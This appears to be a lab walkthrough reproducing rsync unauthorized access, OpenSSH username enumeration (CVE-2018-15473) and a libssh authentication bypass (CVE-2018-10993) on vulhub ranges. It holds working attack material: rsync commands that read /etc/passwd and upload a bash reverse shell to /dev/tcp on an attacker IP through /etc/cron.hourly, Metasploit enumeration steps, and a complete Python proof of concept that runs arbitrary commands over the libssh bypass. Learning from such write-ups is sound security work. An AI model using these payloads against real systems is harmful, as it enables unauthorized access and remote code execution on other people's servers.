Service security-application protocol rsync unauthorized & ssh vulnerability recurrence

Directory

• Service Attack and Defense – Application Protocol rsync &ssh Vulnerability Recurrence
• • Vulnerability recurrence
  • • Improper configuration – unauthorized access – rsync file backup
    • OpenSSH username enumeration vulnerability
    • libssh authentication bypass vulnerability

Service Attack and Defense – Application Protocol rsync & ssh Vulnerability Recurrence

Vulnerability recurrence

Improper configuration-unauthorized access-rsync file backup

rsync default port: 873

rsync is the next data backup tool for Linux, supporting remote file transfer through rsync protocol and ssh protocol.

The rsync protocol listens to port 873 by default. If the target has the rsync service enabled and no ACL or access password is configured, we will be able to read and write the target server files.

Shooting range: vulhub

or vulfocus

Reference: rsync unauthorized access

Start the environment:

After the environment is started, we use the rsync command to access:

rsync rsync://your-ip:873/
//The shooting range maps the port
rsync rsync://192.168.100.134:43983

You can view the list of module names:

Access list:

rsync rsync://your-ip:873/src/
rsync rsync://192.168.100.134:43983/src

Discovering that this is a Linux root directory, we can download arbitrary files:

rsync -av rsync://your-ip:873/src/etc/passwd ./
rsync rsync://192.168.100.134:43983/src/etc/passwd ./

You can also try uploading:

Upload the passwd file to the /src directory
rsync ./passwd rsync://192.168.100.134:43983/src

View verification:
rsync rsync://192.168.100.134:43983/src

Due to the shooting range time, restart the shooting range and continue the experiment:

Rebound shell:

//Download crond file
rsync -av rsync://192.168.100.134:39525/src/etc/crontab ./

Click to view:

Pay attention to the meaning of this line of statement:

Indicates that the run-parts –report /etc/cron.hourly command is executed at the 17th minute of every hour

17 * * * * root cd / & amp; & amp; run-parts --report /etc/cron.hourly

Create a shell file and write the rebound shell command:

#!/bin/bash
/bin/bash -i > & amp; /dev/tcp/192.168.100.146/6666 0> & amp;1

Grant execution permissions:

chmod + x shell

Upload the written shell file to /etc/cron.hourly

rsync -av shell rsync://192.168.100.134:39525/src/etc/cron.hourly

Local monitoring:

nc -lvvp 6666

Just wait for the rebound.

OpenSSH username enumeration vulnerability

Reference: CVE-2018-15473

There is a username enumeration vulnerability before OpenSSH 7.7. Through this vulnerability, an attacker can determine whether a certain username exists in the target host.

Start the environment:

After the environment is started, we execute on the client

ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p 20022, enter the password vulhub to log in to the container.

You can use exp directly to exploit:

exp link: CVE-2018-15473-Exploit

python sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip

Method Two:

You can also use msf for verification testing:

msfconsole //Enable msf
search ssh //Search
use 53
set rhosts 192.168.100.134
set rport 20022
set user_file "dictionary path"
run

Configuration details:

implement:

Execution found that users such as root, example, vulhub, and nobody are existing users.

libssh authentication bypass vulnerability

Reference: libssh server-side permission authentication bypass vulnerability

libssh is a multi-platform C library that implements the SSHv2 protocol on both the client and server sides. A logic vulnerability has been discovered in libssh’s server-side state machine. An attacker can send a MSG_USERAUTH_SUCCESS message before authentication is successful. It can bypass authentication and access the target SSH server.

Turn on the shooting range environment:

After the environment is started, we can connect to the your-ip:2222 port (account password: myuser:mypassword)

use:

Reference: CVE-2018-10993

According to the reference, the poc can be used directly:

#!/usr/bin/env python3
importsys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize=2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output + error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

Perform verification:

python libssh_poc.py 192.168.100.134 2222 "id"
python libssh_poc.py 192.168.100.134 2222 "whoami"
python libssh_poc.py 192.168.100.134 2222 "touch /123.txt"
python libssh_poc.py 192.168.100.134 2222 "ls /"

Created successfully: